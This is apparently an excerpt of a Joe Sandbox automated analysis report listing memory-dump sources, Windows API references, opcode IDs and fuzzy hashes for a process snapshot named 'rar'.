                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CharEnvironmentExpandStrings
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4052775200-0
                                                                                                                                                                                                                                        • Opcode ID: a3ba1b03603a475655284a6a52820d5ab219f11978c107c81e75b3572b44f527
                                                                                                                                                                                                                                        • Instruction ID: d18e275cb564a70474bc61536ab3785c6f7794aad52b38582136b3d3eaf3c325
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a3ba1b03603a475655284a6a52820d5ab219f11978c107c81e75b3572b44f527
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CBE1B332B1A682E5EB628B24D4001BD67A2FB51794F444173DB9E87AD9DF7CE84BC700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF6AA197EBE,00000000,00000000,00000000,00000000,00000007,00007FF6AA197C48), ref: 00007FF6AA1A1B8D
                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF6AA197EBE,00000000,00000000,00000000,00000000,00000007,00007FF6AA197C48), ref: 00007FF6AA1A1BD7
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                        • Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                                        • Instruction ID: 242f43dbb06d9c030363fd4ba4a306974e4dac9ef66bc3b7f47b66736fbcd015
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4311473A19681C6E7719F20D4053A926A0EB40BB8F108376DE6C866C5EF7CDC8AC700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 932687459-0
                                                                                                                                                                                                                                        • Opcode ID: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                                                                                                                                                                                                        • Instruction ID: 19b9232294b523c47c1fb6d45618ee55657f9a1e8a59826cdb9a3562ce12832b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A0217353A09F85D2EB018F29D5510B86360FB9CB88F18A361DF9D42656EF28E5E68300
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 69db96ca1da17c6a2eb1160e9404b7f872c8654a3bd96e1949819b6dda332cdc
• Instruction ID: 6e299348e1875e78e08927da8cc22ceaff3e807fbce7993ae35a1cf52cf8e099
• Opcode Fuzzy Hash: 69db96ca1da17c6a2eb1160e9404b7f872c8654a3bd96e1949819b6dda332cdc
• Instruction Fuzzy Hash: 53119331A0AB81D1EA02EB64A5043A9B3E4EF84790F180676D6AD877E6DF7CD853C310
APIs
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
• Instruction ID: ae148f8345028d475a9abff7dcd49ddd4f0dfcc951cbafa929569f0af3df9217
• Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
• Instruction Fuzzy Hash: C401E535B1E691D2EAA54B26A5004296262EF44BF0F145272DE2D83BE4DF3CEC468700
APIs
• setbuf.LIBCMT ref: 00007FF6AA197A7B
  • Part of subcall function 00007FF6AA1E2AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6AA1E7EF3
• setbuf.LIBCMT ref: 00007FF6AA197A8F
  • Part of subcall function 00007FF6AA197B44: GetStdHandle.KERNEL32(?,?,?,00007FF6AA197A9E), ref: 00007FF6AA197B4A
  • Part of subcall function 00007FF6AA197B44: GetFileType.KERNELBASE(?,?,?,00007FF6AA197A9E), ref: 00007FF6AA197B56
  • Part of subcall function 00007FF6AA197B44: GetConsoleMode.KERNEL32(?,?,?,00007FF6AA197A9E), ref: 00007FF6AA197B69
  • Part of subcall function 00007FF6AA1E2ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6AA1E2AD0
  • Part of subcall function 00007FF6AA1E2B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6AA1E2C1C
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
• String ID:
• API String ID: 4044681568-0
• Opcode ID: 8727ae0c8f4e6654f39e3312ee4fd5538b937ba58b7f1081e43b9e7840c2ab2c
• Instruction ID: ec72cf948af36d6c9e576b3157e56773b71a7d1b8c51e43e4b57921564291c92
• Opcode Fuzzy Hash: 8727ae0c8f4e6654f39e3312ee4fd5538b937ba58b7f1081e43b9e7840c2ab2c
• Instruction Fuzzy Hash: 15011300E0B192A6FE2AB37516B27B919868FC2310F0841FAE01E8AAE3DD5C2C538311
APIs
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
• Instruction ID: 0dbaa82678a09e5e8a9efc4f98c3ed0d01fba170e0650ddd8bf129358642cde8
• Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
• Instruction Fuzzy Hash: 3601A131A19A82E1EB669B29E44027823A1EF40778F144373D53D821F5CF3CD98BC750
APIs
• GetFileAttributesW.KERNELBASE(00000800,00007FF6AA1A305D,?,?,?,?,?,?,?,?,00007FF6AA1B4126,?,?,?,?,00000800), ref: 00007FF6AA1A30F0
• GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF6AA1B4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF6AA1A3119
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                        • Opcode ID: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                                                                                        • Instruction ID: 52324bf8972a3060132f2d62fa71d8caf1c9c5025fe7be9e8438798b67539fd4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29F0A421B196C1D1EA60DB64F4543A96290BF4D7D4F400572E99CC3799DE7CDD468600
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1175261203-0
                                                                                                                                                                                                                                        • Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                                                                                        • Instruction ID: 2d94f2c81f0dcfae6f46323882c9ef6d0f23bb89c5f8fd09eacb665ddeaaa8ed
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95F06821B1E581D1FA719B11E8553FA6264BF48784F804173E9CDC2659EE2CED46CA00
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Process$AffinityCurrentMask
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1231390398-0
                                                                                                                                                                                                                                        • Opcode ID: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                                                                                                                                                                                                        • Instruction ID: e21709d6dd26e884b0a482f46ff92a3987efb70d3ff3a0bdfdd77631102f77a8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2E02B20B3949192DBD98B1AC491FAD1390AF54F80F80207BF44BC3A54ED1CDD468B00
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 485612231-0
                                                                                                                                                                                                                                        • Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                                                                                        • Instruction ID: 9382a0c6d0a90f587c8bf0238242a09b8bb5f6ddb237a9729f6b41ebf754f66f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ECE08660F1B143D6FF669BF2D80417812D05F89B40F0844B6DD0EC6651EE2D6C934204
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 17dbf89f21da43bbd654d9da3b204a736ad4fc838e231dad39fbf41b92fe687c
                                                                                                                                                                                                                                        • Instruction ID: 516255290ce3989289500dcbfbf859ec835254b38af0bb6509c73a29834f4237
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 17dbf89f21da43bbd654d9da3b204a736ad4fc838e231dad39fbf41b92fe687c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89E1D421A0A692E1FB228F2094442B967E1EF41B88F0451B7DE4D8B7D6DEACBC47C710
                                                                                                                                                                                                                                        APIs
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c7a1d2a60ffdbc43dff3a0632d536e208070f789ed259da07b8fca2f3bbe514d
• Instruction ID: 0db69eefc58ad7cfb0d27474b71a9b99494ac82dacd0b2603e4b01eba780ba44
• Opcode Fuzzy Hash: c7a1d2a60ffdbc43dff3a0632d536e208070f789ed259da07b8fca2f3bbe514d
• Instruction Fuzzy Hash: 83514472529BD1A4E7019F34A8441ED37A8FB44F88F18427ADE884B79ADF389462C331
APIs
Similarity
• API ID: HandleModule$AddressFreeLibraryProc
• String ID:
• API String ID: 3947729631-0
• Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
• Instruction ID: fa2ef60411977361bbe95146c96af7a130c7f15563207c4378e655b72dc4692d
• Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
• Instruction Fuzzy Hash: 0441DE21A1B683E2FF7A9B10996027863A1AF95B40F4444BBD90EC7AD5DE3DEC478740
APIs
Similarity
• API ID: CommandLine
• String ID:
• API String ID: 3253501508-0
• Opcode ID: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
• Instruction ID: 3a79ec34c64a8deb1d34cb3a9fe27bfbcc6095ad85dd137044619f6da393bf46
• Opcode Fuzzy Hash: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
• Instruction Fuzzy Hash: EA01C415B0E642D5EA12E716E6001BD57A0AF99B94F480473EE4D47369DE3DDC43C384
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
• Instruction ID: 041d94d1143dec9585600d9f0331787f53f17152fa7bb5a3917ab87de52c6452
• Opcode Fuzzy Hash: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
• Instruction Fuzzy Hash: 46011250B0F542E8FA769666DB4067951505F86BD4F4882B3DD1EC6AD6ED2EAC434100
APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: CompareString
• String ID:
• API String ID: 1825529933-0
APIs
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
APIs
Memory Dump Source
